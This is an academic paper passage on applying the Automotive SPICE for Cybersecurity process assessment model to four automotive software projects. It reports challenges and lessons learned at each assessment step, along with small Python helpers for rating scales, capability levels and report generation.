22. U-blox NEO-6M GPS Module | Core Electronics Australia. https://core-electronics.com.au/u-blox-neo-6m-gps-module.html. Accessed 23 June 2022
23. Arduino Nano Pinout, Specifications, Features, Datasheet & Programming. https://components101.com/microcontrollers/arduino-nano. Accessed 23 June 2022
24. Arduino Nano 3 Compatible - Micro Robotics. https://www.robotics.org.za/NANO-CH340. Accessed 23 June 2022
Standardization of Cybersecurity Concepts in Automotive Process Models: An Assessment Tool Proposal

Noha Moselhy1(B) and Ahmed Adel Mahmoud2

1 Principal ASPICE Assessor, CMMi v1.3 ATM, and a Process Improvement and Software Engineering Quality Expert, Valeo, Egypt
[email protected]
2 Provisional ASPICE Assessor, CMMi v1.3 ATM, and a Sr. Process Improvement and Assessments Engineer, Valeo, Egypt
[email protected]
Abstract. In the high-tech and information communication domains, the use of network communication and cloud services is unavoidable, which exposes systems and software products to cyber-attacks that cause loss of money or vital information, or may even cause safety hazards. Hence, cybersecurity is considered an integral part of development, and it attracted a lot of focus in the late 20th century. This led some large industries (e.g. automotive) and service providers to consider releasing specific standards and process models for cybersecurity. In August 2021, the German Association of the Automotive Industry “VDA”, which counts the top car manufacturers worldwide as members, released a new process model appendix called Automotive SPICE for Cybersecurity, which focuses on the Process Reference and Process Assessment Models for Cybersecurity Engineering and on the Rating Guidelines of Process Performance for Cybersecurity Engineering. This paper presents a case study of the results of applying this new standard to a sample set of projects. It investigates the challenges and lessons learned from following the traditional methodology of process capability assessments in the new cybersecurity process assessments, and introduces a few tool proposals to cope with the specific requirements and constraints of a cybersecurity process model, which can also help practitioners in other domains (e.g. SSE-CMM). The study also urges the VDA to officially incorporate those best practices into the newly released cybersecurity process model of Automotive SPICE to ensure a secure product and a threat-immune organizational infrastructure.

Keywords: Automotive SPICE for cybersecurity · Automotive SPICE PAM v3.1 · CMMi v1.3 · CMMi v2.0 · SSE-CMM · ISO27001 · SAE J3061 · ISO26262 · Automotive software · Improved implementation of process models · CMMi extension · SOC-CMM
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 635–655, 2023. https://doi.org/10.1007/978-3-031-28073-3_44
N. Moselhy and A. A. Mahmoud
1 Introduction

Cybersecurity plays a vital role in the development of many recent industries that depend on software and cloud communication. Remote hacking and cyber-attacks via system penetration or network-based scanning are threats that carry high risks: they already jeopardize human safety, not to mention the loss of vital assets. In the past, information system vulnerabilities arose only from the malfunction of one or more features of the internal software. Today, it is not enough to implement validation and verification mechanisms (e.g., testing, protection mechanisms, audits, application of traditional standard process models) without considering security factors from the external environment of the software product. As a result, the automotive industry became aware of such challenges and started to introduce guidelines for the development of both safety- and security-based solutions. Furthermore, the German Association of the Automotive Industry “VDA” [1] introduced a new factor into the equation: the “Automotive SPICE® [4] for Cybersecurity”, which gives not only guidelines for the technical implementation of such systems, but also a guide for process model implementers and assessors to evaluate the development process of Cybersecurity components (system or software) against the expectations of the standards.

In this paper, we demonstrate the assessment process using the Automotive SPICE for Cybersecurity [2] assessment model through a case study, showing the key challenges encountered along with lessons learned and proposals for improvements that can be introduced into the assessment process to mitigate those challenges. The paper also proposes, by example, some tools that Automotive SPICE process model practitioners can use to help reach the goals described in the standard and to satisfy their assessment needs as per the Automotive SPICE for Cybersecurity model.

This paper is organized as follows: 1) Introduction, scope, and paper background. 2) The case study methodology. 3) The case study observations and consolidation. 4) Results, conclusion, and improvement proposals. 5) Recommendations for future work.

1.1 Scope

This paper addresses automotive tier-one suppliers in general and, specifically, automotive software suppliers who provide software solutions in the automotive field. Currently, most Original Equipment Manufacturers “OEMs” in the automotive industry require suppliers to be certified in Automotive SPICE as a prerequisite for becoming and remaining a supplier in the OEM’s database or for being considered for future business. Likewise, in non-embedded systems development environments, most customers require the operational center to be certified for CMMi for Development v1.3 [7], at least for a certain scope. Extending those requirements to include compliance with Cybersecurity standards [6] is a natural expectation, especially in communication domains.
Standardization of Cybersecurity Concepts in Automotive Process Models
As for the lessons learned from applying Cybersecurity process models in non-embedded software development organizations (such as the SSE-CMM [3]), please refer to the background section. This paper presents a case study that results from applying the Automotive SPICE for Cybersecurity process model appendix to a selected sample of projects in a certain environment with a Cybersecurity development scope. The scope of the process capability assessment and its process profile, as agreed with the sponsors for the selected sample of projects, are described in Table 1.

Table 1. Assessment scope - targeted process areas

| Assessment inputs | In scope aspects | Out-of-scope aspects |
|---|---|---|
| Number of assessment projects | 4 | Projects with Non-Cybersecurity scope or SPICE requirements |
| Target capability level of SPICE | CL1 | CL2/3 |
| Assessed process attribute | PA1.1 | PA2.1, PA2.2, PA3.1, PA3.2 & above |
| Process group | Management, Engineering (System, Software, & Cybersecurity), & Support | Acquisition, Organizational, Process Improvement, Reuse, and Supply |
| Process areas | VDA Scope: MAN.3, MAN.7, SYS.2–5, SWE.1–6, SEC.1–4, SUP.1, SUP.8–10 | ACQ.2, ACQ.4 |
| Characteristics | Class 3, Type C | – |
The scope also considered the dependencies between the engineering process areas and the security process areas in both implementation and rating, following the ASPICE rating guideline.

1.2 Background and Approaches

The need to include standard security engineering approaches and maturity assessment models in information technology and software product development processes, both embedded and non-embedded, has been under study for many years because of the increasing importance of Cybersecurity considerations in the technological field. In the non-embedded software development field, where the CMMi process model is widely used as a standard process model, efforts were made in 2008 to demonstrate the need for standardizing organization-wide security practices, when Marbin Pazos-Revilla and Ambareen Siraj of the Department of Computer Science at Tennessee Technological University published an important paper on SSE-CMM implementation: “Tools and Techniques for SSE-CMM Implementation” [13].
That paper [13] demonstrated the importance of standardizing security process practices, as standardization increases productivity, efficiency, and customer satisfaction. The Systems Security Engineering Capability Maturity Model (SSE-CMM) offers industry practitioners a security engineering standard that can be implemented and integrated at different organizational levels according to assurance needs. Although the SSE-CMM provides the necessary roadmap for adopting organization-wide quality security engineering practices, it does not point out any specific tools and techniques that can be used to help reach the goals described in the standard. The paper [13] therefore proposed some tools that can aid practitioners in satisfying their assurance needs.

Following those efforts, work was done on measuring the capability maturity of Security Operations Centers with the “SOC-CMM” [14], which was created in 2016 as a Master’s thesis research project in the Master of Information Security program at Luleå University of Technology (LTU). The SOC-CMM was created by Rob van Os, MSc, a strategic SOC advisor with practical experience in security administration, security monitoring, security incident response, security architecture, and security operations centers. The SOC-CMM combines practical testing and experience to create a usable maturity assessment tool. A major limitation of the SOC-CMM is that it was created to address the security of operations centers and does not address the security of the final software and technological product against possible breaches and attacks. Another limitation is that it does not address the elicitation of Cybersecurity product requirements, implementation, risk treatment, or validation for technological and software projects.

Regarding experience with such Cybersecurity assessment models, and how to measure the capability of process activities and the maturity of organizations: in 2008, Clear Improvements & Associates, LLC gave an important presentation [5] at the “SEPG” conference highlighting the lessons learned from a joint CMMI (v1.2) and SSE-CMM (v3.0) Class B SCAMPI appraisal. However, the study did not cover the automotive scope, nor did it propose sample tools to be used in such Cybersecurity-specific assessments.

As for the automotive industry, in December 2015 Mark S. Sherman of the Software Engineering Institute “SEI” published an important paper on cybersecurity considerations for vehicles titled “CYBERSECURITY CONSIDERATIONS FOR VEHICLES” [8]. The paper addressed the amount of software and the number of ECUs in modern vehicles, which contain up to 100 ECUs connected to fulfill their respective functions, and how Cybersecurity requirements need to expand to cover possible threats arising from communication among such a large number of ECUs. However, the paper did not address any techniques relevant to the development process. In 2021, Stephanie Walton and Patrick R. Wheeler published an important paper on current and future cybersecurity analysis titled “An Integrative Review and Analysis of Cybersecurity Research: Current State and Future Directions” in the “Journal of Information Systems” [9].
That paper noted that advances in information technology have greatly changed communications and business transactions between firms and their customers and suppliers. As a result, cybersecurity risk attracts ever-increasing attention from firms, regulators, customers, shareholders, and academics. The authors conducted an extensive analysis of cybersecurity-related papers in the accounting, information systems, computer science, and general business disciplines. Their review integrates and classifies 68 cybersecurity papers, motivated by the observation that, despite increasing interest in cybersecurity research, the literature lacked an integrative review of existing research that identifies opportunities for future cybersecurity developments.

The two types of papers referred to above are examples of how to deploy Cybersecurity standards from a technical point of view only, with no-to-minimal focus on process activities in either embedded or non-embedded software environments. In August 2021, right after the VDA released the official version of the Automotive SPICE appendix for Cybersecurity, Christian Schlager from Graz University published a paper titled “The Cybersecurity Extension for ASPICE - A View from ASPICE Assessors” [10], which studied the relationship between the Cybersecurity process areas and base practices from other process areas of the primary and management process groups in the A-SPICE standard. At that time, it was too early for Dr. Schlager or anybody else to study or present insights from applying the new model itself, and thus to identify challenges to reflect upon or lessons learned to share.

In the same month, another paper was published by Springer at the EuroSPI conference, titled “Impact of the New A-SPICE Appendix for Cybersecurity on the Implementation of ISO26262 for Functional Safety” [11] and presented by Noha Moselhy and Yasser Aly, which addressed possible strategies for integrating the different standards and work products required by A-SPICE for Cybersecurity and ISO 26262 [12] for Functional Safety in order to save development projects time and effort. Also in August 2021, in her paper “A-SPICE for Cybersecurity: Analysis and Enriched Practices”, published by Springer, Esraa Magdy [16], a Cybersecurity expert, put forward a few improvement proposals that A-SPICE for Cybersecurity can consider to improve assessment effectiveness and efficiency. However, the paper did not provide enough typical examples and evidence of work products from real implementations that a practitioner can adapt in order to fulfill A-SPICE process outcomes. More recently, in January 2022, Dr. Richard published a paper titled “Automotive Cybersecurity Manager and Engineer Skills Needs and Pilot Course Implementation” [17] that addressed the skills that Cybersecurity engineers and managers should have. That paper focused on the needed training and certification content, and it did not offer a solution to a Cybersecurity engineer’s need to master the compliance of their work products with the different standards in the field, such as Automotive SPICE. None of the aforementioned papers, however, addressed real experience from applying the newly released Automotive SPICE standard for Cybersecurity.
1.3 Motive

A major motive behind this paper [15] is that in August 2021 the German Association of the Automotive Industry “VDA” released a new appendix for process assessment models dedicated specifically to Cybersecurity development, called the “Automotive SPICE for Cybersecurity” [2], which addresses how process capability shall be evaluated for Cybersecurity development projects from two points of view:
• Cybersecurity Product-Related Project Risks
• Cybersecurity Process Improvement

The challenges in deploying this model [2] and assessing its process areas with respect to A-SPICE are emerging only now, as automotive manufacturers start to request compliance with A-SPICE for Cybersecurity from every project while automotive suppliers are still trying to understand and implement it under the new constraints implied by the Cybersecurity practices. The challenges lie not only in deploying the process model but also in the assessment procedure itself. The need for tools and techniques to aid in assessing the desired process areas was highlighted during the early assessment trials, which motivated us to tackle the challenges, generate lessons learned, and propose tools and techniques for process assessments using the Automotive SPICE Process Assessment Model for Cybersecurity Engineering.

Automotive SPICE stands for Automotive Software Process Improvement and Capability dEtermination. It was created in 2001 as a variant of ISO/IEC 15504 (SPICE) to assess the performance of the development processes of OEM suppliers in the automotive industry. It defines best practices and processes to ensure the highest quality of embedded automotive system and software development. The certification process is based on an audit conducted by external or independent A-SPICE assessors who are certified by an academic certification body.

A-SPICE was developed by the AUTOSIG (Automotive Special Interest Group), which consists of the SPICE User Group, the Procurement Forum, and the German automotive manufacturers Audi, BMW, Daimler, Porsche, and Volkswagen, along with other international automotive manufacturers such as Fiat, Ford, Jaguar, Land Rover, and Volvo, who together form the VDA association members. The processes of A-SPICE are clustered by common topics (such as acquisition, management, engineering, supply, support, and logistics) to form the so-called process areas, which Automotive SPICE uses to describe the life cycle of electronic products, as shown in Fig. 1. The process assessment model (PAM) maps the extent of process performance to specific capability levels and defines how these levels can be assessed. Capability levels measure, on a given scale, the extent to which a process is performed, as described in Figs. 2 and 3. Automotive SPICE conforms to the ISO/IEC 15504-2 assessment requirements. The assessments evaluate on six levels how capable an organization is of running mature processes. For each level, the framework defines specific capability indicators to measure the extent of achievement. An ASPICE process area assessment is based on rating the process attributes (PAs): capability level X is reached if the PAs of level X are rated at least L (Largely) and all PAs of the lower levels are rated F (Fully), as indicated in Fig. 4 and Table 2.
Fig. 1. Automotive SPICE [2] and automotive SPICE for cybersecurity process reference model – overview
Fig. 2. N/P/L/F measurement scale
Fig. 3. N/P/L/F further refined measurement scale [4]
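The N/P/L/F scale in Figs. 2 and 3 can be read as a lookup from a percentage of achievement to a rating. The following is a minimal sketch, assuming the percentage bands commonly published for the ISO/IEC 33020 rating scale (N up to 15%, P up to 50%, L up to 85%, F above 85%, with the refined P-/P+ and L-/L+ split at 32.5% and 67.5%). The function name `nplf_rating` and the table names are illustrative and are not part of any assessment tool described in this paper.

```python
# Upper bounds (inclusive) of each rating band, in percent of achievement.
# Assumption: bands follow the commonly published ISO/IEC 33020 scale.
BASIC_BANDS = [(15.0, "N"), (50.0, "P"), (85.0, "L"), (100.0, "F")]
REFINED_BANDS = [
    (15.0, "N"),
    (32.5, "P-"),
    (50.0, "P+"),
    (67.5, "L-"),
    (85.0, "L+"),
    (100.0, "F"),
]


def nplf_rating(achievement_percent: float, refined: bool = False) -> str:
    """Map a percentage of achievement to an N/P/L/F rating."""
    if not 0.0 <= achievement_percent <= 100.0:
        raise ValueError("achievement must be between 0 and 100 percent")
    bands = REFINED_BANDS if refined else BASIC_BANDS
    for upper_bound, label in bands:
        if achievement_percent <= upper_bound:
            return label
    raise AssertionError("unreachable: 100% is covered by the last band")
```

In practice the percentage is an assessor judgment rather than a measured value, so a helper like this only documents the scale; it does not replace the rating decision.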
Fig. 4. Process capability levels [4]
2 Case Study Methodology and Scope

A process capability assessment was performed using the newly released A-SPICE process model for Cybersecurity on a selected set of four software projects with Cybersecurity development components. It was followed by a case study to determine the impact of the new Automotive SPICE appendix for Cybersecurity on the assessment methodology in terms of challenges, and to apply a few best practices using a newly introduced assessment tool that complies with the requirements of A-SPICE for Cybersecurity. The case study produced a list of lessons learned from applying the new tool, which can guide model practitioners, as well as all organizations with a Cybersecurity project scope, on best practices during assessments, as described in Fig. 5.

Sample Selection: A specific set of sample projects was selected for a BETA trial assessment of the new A-SPICE process model for Cybersecurity. 1) The project set consists of four projects from various platforms with different product requirements. All of the selected projects include system, software, and Cybersecurity module development implementing a few security protection mechanisms, with a potential target level of A-SPICE compliance. 2) The teams working on these projects are familiar with the Automotive SPICE process reference model requirements and participated in earlier assessments before the release of the new Cybersecurity appendix. 3) The assessment team consists entirely of certified A-SPICE assessors and has three members: one lead assessor and two co-assessors. 4) The assessment tool had already been used in traditional assessments. 5) The assessment scope was defined as per Sect. 1.1.
Table 2. Process capability level model according to ISO/IEC 33020 [4]

| Scale | Process attribute | Rating |
|---|---|---|
| Level 1 | PA 1.1: Process Performance | Largely |
| Level 2 | PA 1.1: Process Performance | Fully |
| | PA 2.1: Performance Management | Largely |
| | PA 2.2: Work Product Management | Largely |
| Level 3 | PA 1.1: Process Performance | Fully |
| | PA 2.1: Performance Management | Fully |
| | PA 2.2: Work Product Management | Fully |
| | PA 3.1: Process Definition | Largely |
| | PA 3.2: Process Deployment | Largely |
| Level 4 | PA 1.1: Process Performance | Fully |
| | PA 2.1: Performance Management | Fully |
| | PA 2.2: Work Product Management | Fully |
| | PA 3.1: Process Definition | Fully |
| | PA 3.2: Process Deployment | Fully |
| | PA 4.1: Quantitative Analysis | Largely |
| | PA 4.2: Quantitative Control | Largely |
| Level 5 | PA 1.1: Process Performance | Fully |
| | PA 2.1: Performance Management | Fully |
| | PA 2.2: Work Product Management | Fully |
| | PA 3.1: Process Definition | Fully |
| | PA 3.2: Process Deployment | Fully |
| | PA 4.1: Quantitative Analysis | Fully |
| | PA 4.2: Quantitative Control | Fully |
| | PA 5.1: Process Innovation | Largely |
| | PA 5.2: Process Innovation Implementation | Largely |
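The rule encoded in Table 2 can be sketched in a few lines: a level is achieved when its own process attributes are rated at least Largely and every attribute of the lower levels is rated Fully. The sketch below is illustrative only. The names `LEVEL_ATTRIBUTES` and `capability_level` are hypothetical, ratings are assumed to be given on the basic N/P/L/F scale (not the refined one), and a missing rating is treated as N.

```python
from __future__ import annotations

# Process attributes introduced at each capability level (see Table 2).
LEVEL_ATTRIBUTES = {
    1: ["PA1.1"],
    2: ["PA2.1", "PA2.2"],
    3: ["PA3.1", "PA3.2"],
    4: ["PA4.1", "PA4.2"],
    5: ["PA5.1", "PA5.2"],
}


def capability_level(ratings: dict[str, str]) -> int:
    """Return the highest capability level (0-5) supported by the PA ratings.

    `ratings` maps attribute ids such as "PA1.1" to "N", "P", "L" or "F".
    Attributes that are missing from the mapping are treated as "N".
    """
    achieved = 0
    for level in sorted(LEVEL_ATTRIBUTES):
        own = LEVEL_ATTRIBUTES[level]
        lower = [pa for lv in range(1, level) for pa in LEVEL_ATTRIBUTES[lv]]
        # The level's own attributes need at least Largely ...
        own_ok = all(ratings.get(pa, "N") in ("L", "F") for pa in own)
        # ... and every attribute of the lower levels needs Fully.
        lower_ok = all(ratings.get(pa, "N") == "F" for pa in lower)
        if not (own_ok and lower_ok):
            break
        achieved = level
    return achieved
```

For the scope in Table 1 (target CL1, PA1.1 only), the check reduces to whether PA1.1 is rated L or F for each assessed process area.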
Fig. 5. The steps of this case study methodology followed in this paper
Performing the Assessment and Analyzing the Challenges: In this step, the same list of project work products was inspected and evaluated against Automotive SPICE including the Cybersecurity appendix. The assessment was done via direct interviews with the project teams and objective evaluation of the evidence they demonstrated, in accordance with the ISO/IEC 15504 requirements and following the Automotive SPICE guidelines and steps for assessments.

Recording the Observations, and Consolidating the Solutions: In this step, the results and data obtained from the inspection in the previous step are consolidated. An investigation was carried out to determine the effective solutions used during each assessment step to tackle the challenges faced by the assessment team, including the use of new assessment tools and techniques following the introduction of the new Automotive SPICE process group for Cybersecurity (SEC).

Conclusion: In this step, a final recommendation is given as a list of lessons learned from each assessment step, based on applying the newly proposed Cybersecurity practices to the selected projects and on using the new customized assessment tools proposed by the assessment team.
3 Case Study Observations and Results Consolidation

A case study was conducted on a sample of four projects from different product lines, selected specifically for this research, in which the new A-SPICE process model appendix for Cybersecurity was used for assessment. The selected projects have Cybersecurity software components and customer requirements to reach a specific capability level of Automotive SPICE for Cybersecurity. For confidentiality reasons, however, these projects are referred to only anonymously in this paper. The case study aimed at recording the observations from the four assessments of the four projects, focusing only on the common challenges, lessons learned, and best practices encountered while applying the new process model in the real operational environment of the four projects, and not on the rating results of the assessments. The investigation of these challenges and lessons learned is written in a simple and readable format for researchers.

3.1 Overview of Automotive SPICE Assessment Methodology Steps

In the Automotive SPICE standard, the assessment is carried out following certain steps. This section gives an overview of these steps, as shown in Fig. 6. Later, we investigate in depth the application of each step performed during our experimental assessments in order to explore the challenges we faced in each step and to derive the possible lessons learned or best practices for each step.

3.2 Details of the 1st Automotive SPICE Assessment for Cybersecurity (Challenges/Lessons Learned)

In this section, we go through each step of the assessment process to show the exact challenges we faced while applying this new standard process model for Cybersecurity.
Fig. 6. ASPICE assessment process elements
We also explore some of the lessons learned and best practices that we suggest practitioners of the new process model follow in order to avoid similar pitfalls.

Pre-assessment
Key Activities: In this phase, the Lead Assessor and the Assessment Team members prepared for the assessment together with the project/organization unit that requested it. No evaluation steps or ratings took place at this stage.
Challenges:
• Process Perspective (existing process readiness): The projects under examination were using a Cybersecurity process that had not been analyzed against the new A-SPICE process model for Cybersecurity.
• Assessment Perspective (assessor qualifications): Existing assessors needed training/certification rounds on the new A-SPICE appendix for Cybersecurity.
• Project Perspective (project team understanding): The project team needed coaching sessions on the new requirements of the A-SPICE appendix for Cybersecurity.
Lessons Learned & Best Practices:
• Establish a project process working group (PWG) to perform a gap analysis between the project’s implemented Cybersecurity processes/templates and the outcomes of the A-SPICE process model appendix for Cybersecurity.
• Coordinate with Cybersecurity experts for the needed coaching sessions.

Assessment Step One: Assessment Planning
Key Activities:
• Set the assessment objectives with the Sponsors (product-related process risk, process improvement…).
• Agree on the scope (project Organization Units “OU”, processes to be assessed, target capability level, assessment class…).
• Agree on constraints.
• Identify the assessment schedule with the participants.
Challenges:
• Project Perspective (redundancy in the schedule, i.e., inefficiency): Project team participants for the engineering activities have to attend two sessions per process area, one to cover the rating for SYS/SW Engineering and one for the rating of the relevant Cybersecurity “SEC” process areas.
Lessons Learned & Best Practices:
• Update the assessment tool to include an automated mapping between the ratings of the base practices of the Cybersecurity “SEC” process areas and the relevant base practices of the Engineering “SYS/SWE” process areas. The mapping shows discrepancies in the rating of dependent base practices, following the Rating Guidelines advised by the Automotive SPICE standard appendix for Cybersecurity assessments [2], as demonstrated in Fig. 7 and in the process area mapping in Fig. 8.
Fig. 7. Proposed solution for an assessment tool to support the rating between dependent base practices from different process areas according to the A-SPICE rating guidelines for cybersecurity
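The kind of cross-check proposed in Fig. 7 can be sketched as a small consistency pass over the recorded ratings. This is not the authors' tool: the dependency pairs below are placeholders, since the actual pairs come from the A-SPICE rating guidelines for Cybersecurity [2], and the comparison rule (a SEC base practice should not be rated higher than the engineering base practice it depends on) is an assumption made only to keep the example concrete.

```python
from typing import Dict, List, NamedTuple, Tuple

# Ordering of the basic rating scale, lowest to highest.
RATING_ORDER = {"N": 0, "P": 1, "L": 2, "F": 3}

# Placeholder (SEC practice, engineering practice) pairs for illustration.
# The real dependencies must be taken from the rating guidelines.
EXAMPLE_DEPENDENCIES: List[Tuple[str, str]] = [
    ("SEC.2.BP1", "SWE.1.BP1"),
    ("SEC.3.BP2", "SWE.4.BP2"),
]


class Discrepancy(NamedTuple):
    sec_practice: str
    eng_practice: str
    sec_rating: str
    eng_rating: str


def find_discrepancies(
    ratings: Dict[str, str],
    dependencies: List[Tuple[str, str]],
) -> List[Discrepancy]:
    """List dependent pairs whose ratings look inconsistent.

    Assumed rule: a SEC practice rated higher than the engineering
    practice it depends on is flagged for the assessors to review.
    Pairs with a missing rating are skipped.
    """
    flagged = []
    for sec_bp, eng_bp in dependencies:
        if sec_bp not in ratings or eng_bp not in ratings:
            continue
        if RATING_ORDER[ratings[sec_bp]] > RATING_ORDER[ratings[eng_bp]]:
            flagged.append(
                Discrepancy(sec_bp, eng_bp, ratings[sec_bp], ratings[eng_bp])
            )
    return flagged
```

A flagged pair is only a prompt for discussion in the closed rating session; the assessors still decide whether the difference is justified by the evidence.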
Assessment Step Two: Assessment Team Briefing
Key Activities:
• Review the assessment plan.
• Determine the assessment team roles.
• Determine the storage of received work products.
• Agree on the usage of the assessment tool (e.g., checklists).
• Agree on decision making.
• Agree on the work split between team members and the methods for consolidation.
Challenges:
• Assessment Perspective (assessment tools): The available assessment tools had not yet been updated to reflect the new practices of the A-SPICE for Cybersecurity appendix.
• The level of knowledge/training on the new A-SPICE Cybersecurity process model was not the same for all assessment team members.
Fig. 8. Sample of mapping for the new cybersecurity process areas to the engineering process areas (system and software) of the A-SPICE process model [2]
Lessons Learned & Best Practices: Update the assessment tools in use to include the requirements of A-SPICE for Cybersecurity, as clarified in Fig. 9. Hold knowledge-sharing sessions to raise awareness of, and alignment on, the new A-SPICE process model for Cybersecurity, as demonstrated in Fig. 11, and agree on the typical evidence for each process outcome inside the assessment tool, as clarified in Fig. 10.
Fig. 9. Updated assessment tool to include process areas from cybersecurity new process model mapped to their related evidence with ability to rate according to the SPICE NPLF assessment method
Fig. 10. Assessment tool updated with recommended typical evidence to be checked from the organization under assessment
Fig. 11. Training material was prepared for the assessment team to introduce how the release of the new process model for cybersecurity will impact the assessment methodology
Assessment Step Three: On-Site Organizational Unit “OU” Briefing
Key Activities:
• Introduce the teams (to break the ice and reduce anxiety).
• Inform the project team about the assessment plan (overview).
• Present the schedule.
• Let the team give a short introduction of the OUs and how the work is distributed.
Challenges: None.
Lessons Learned & Best Practices: None.

Assessment Step Four: Information Gathering & Rating
Key Activities:
• Examine evidence and work products.
• Interview team members and listen to testimonials.
• Investigate the infrastructure.
• Explore project demonstrations objectively.
• Perform the assessment team rating (in closed sessions).
• Maintain traceability between the examined evidence and the ratings.
Challenges:
• Assessment Perspective (redundancy of interview and rating efforts): The assessment tool has no direct link between the base practices of the Cybersecurity process areas and their relevant base practices in the Primary Lifecycle process areas (System/Software engineering process areas), which means that the rating and the interviewing effort have to be repeated separately.
• The assessors’ lack of previous experience with the Cybersecurity domain required extra effort in detecting the gaps and concluding the weaknesses.
• Project Perspective: Access rights to resources shared between OUs can jeopardize the Cybersecurity constraints.
• The project team’s awareness of the terminology of the new A-SPICE Cybersecurity process model was low, which made it difficult to map the base practices to the typical evidence that was already available.
• Some of the work products listed by Automotive SPICE per process area do not yet have equivalent artifacts in the standard process implemented by the project.
Lessons Learned & Best Practices:
• Rate each indicator and process attribute of each process area separately, as shown in Fig. 12.
• Automating the assessment tool’s rating guidelines between dependent base practices is necessary.
• Raise the project team’s awareness of Cybersecurity SPICE through coaching sessions with Cybersecurity experts in the OU, as shown in Fig. 13.

Assessment Step Five: Feedback Presentation Preparation
Key Activities:
• Refer to the assessment plan.
• Include in the results the process profile, capability profile, strengths/weaknesses, improvement suggestions, and rating of indicators.
• Include an executive summary.
Challenges:
• Assessment Perspective: The efficiency of the report preparation phase is reduced by the complexity of the presented findings, which include dependencies between base practices from the System and Software process areas and the Cybersecurity process areas.
Lessons Learned & Best Practices:
Fig. 12. Traceability of the base practices of MAN.7 process area for cybersecurity risk management from A-SPICE process model to their typical evidence recommendations from the assessment tool in addition to the relevant rating indicators from the assessor judgment
Fig. 13. Outline of the training module conducted for the project team on the new process model Appendix of cybersecurity from A-SPICE
• The assessment team automated the assessment tool so that a script generates the final assessment report, which includes all objective findings linked to their relevant base practices and impacted process areas, producing an output as clarified in Fig. 15. This saved around 85% of the reporting time, as shown in the automated assessment tool workflow in Fig. 14.

Assessment Step Six: Final Feedback Presentation
Key Activities:
• Present the assessment outcome.
• Discuss subsequent process improvements.
Fig. 14. Workflow of the automated assessment tool which is used to generate assessment reports via a script
Fig. 15. Generated report from the automated assessment tool script exported format
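The report generation shown in Figs. 14 and 15 can be approximated by grouping recorded findings by process area and emitting them in a fixed order. The paper does not describe the script itself, so the sketch below is only one possible shape: the `Finding` fields, the `build_report` function, and the plain-text layout are all assumptions made for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Finding:
    """One objective finding recorded by the assessment team (hypothetical fields)."""
    process_area: str   # e.g. "MAN.7"
    base_practice: str  # e.g. "BP1"
    rating: str         # N, P, L or F
    text: str           # the finding as worded by the assessor


def build_report(findings: Iterable[Finding]) -> str:
    """Render findings as plain text, grouped and sorted by process area."""
    grouped: Dict[str, List[Finding]] = defaultdict(list)
    for finding in findings:
        grouped[finding.process_area].append(finding)

    lines = ["Assessment findings report"]
    for area in sorted(grouped):
        lines.append("")
        lines.append(f"Process area {area}")
        # Sorting is by the practice id as a string, which is enough here.
        for finding in sorted(grouped[area], key=lambda f: f.base_practice):
            lines.append(
                f"  {finding.base_practice} [{finding.rating}]: {finding.text}"
            )
    return "\n".join(lines)
```

Keeping each finding linked to its base practice and process area in the data, rather than in free text, is what allows the same records to feed both the rating view and the exported report.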
Do pre-briefing/briefing with the Sponsors and OU Management (emphasize the assessment goals, respect confidentiality, treat participants anonymously). Include process profiles, capability profiles, & weaknesses. Co-assessors shall take notes for assessment team improvement. Respond to questions. Challenges. Project Perspective: Skipping the pre-briefing with the Sponsors led to an extended briefing session in order to explain to them the complex findings in the required level of details which guarantee understanding of the areas for improvement. Process Perspective: Difficulty for the organization to identify improvement proposals for the detected gaps due to novelty, and complexity of the presented findings which include dependency between engineering process group practices, and Cybersecurity process practices, this led to lack of up-to-date information in the implemented process by the project. Assessment Perspective: Reposing to questions about future improvements of the existing process led to an extended briefing session. Lessons Learned & Best Practices: Ensure to hold a pre-briefing session with the Sponsors. Team questions about improvements can be handled in a separate “workout session” between the assessment and the project teams. We defined a process working group within the project organization which includes process engineers, cybersecurity experts, and A-SPICE experts to perform a mapping and a gap analysis between the implemented processes/templates inside the project for both System/Software and cybersecurity engineering processes and the detected findings
N. Moselhy and A. A. Mahmoud
from the conducted SPICE assessment to ensure a robust process update which considers dependencies as shown in Fig. 16. A classic process update setup is no longer helpful.
Fig. 16. Gap analysis between existing process used by the project and the cybersecurity base practices from the new process model Appendix of A-SPICE
Assessment Step Seven: Assessment Debriefing Key Activities. Sponsors sign assessment logs. Discuss post assessment actions (e.g.: Assessment method improvement suggestions, team lessons learned…). Challenges: None. Lessons Learned & Best Practices. None. Assessment Step Eight: Assessment Final Report. Key Activities. Finalize Assessment Report. Review assessment report. Distribute final assessment report to stakeholders and sponsors. Challenges. Assessment Perspective: More time was consumed in report review activity than usual. Lessons Learned & Best Practices: Plan more time for the assessment report review activity until the practice stabilizes between assessors.
4 Study Results and Final Conclusion
The case study and the assessments conducted above have shown that the traditional A-SPICE assessment methodology and the assessment tools used are heavily impacted by the newly published Automotive SPICE® for Cybersecurity, given the same inputs and development circumstances. The project assessments generated quite a few lessons learned and updates to both the assessment method and the assessment tools used by the same certified Automotive SPICE assessment team. New gaps in the traditional process assessment tools and methods have been identified in each step of the assessment approach in light of standardizing the Cybersecurity aspects inside the new Automotive SPICE process model appendix for Cybersecurity. These new gaps may not have a direct impact on the project’s overall compliance (capability level) with Automotive SPICE; however, they certainly impact the assessment pre-planning, planning, execution, and post-execution phases in terms of time, methodology, and awareness of both the assessed project team and the assessment team. The exact percentage increase in the effort spent on assessments after including the Cybersecurity process group in the plan is a topic that needs to be further studied by Automotive SPICE practitioners. Further automation of the assessment rating recommendations, considering the dependencies that the SPICE guidelines define between process groups and processes, is also a topic with large potential for improvement and experimentation inside the Automotive community. The non-embedded community process models such as SSE-CMM still have room for improvement regarding similar topics of automation and efficiency for process appraisals of Cybersecurity development projects and products.
5 Conclusion and Recommendations for Future Work
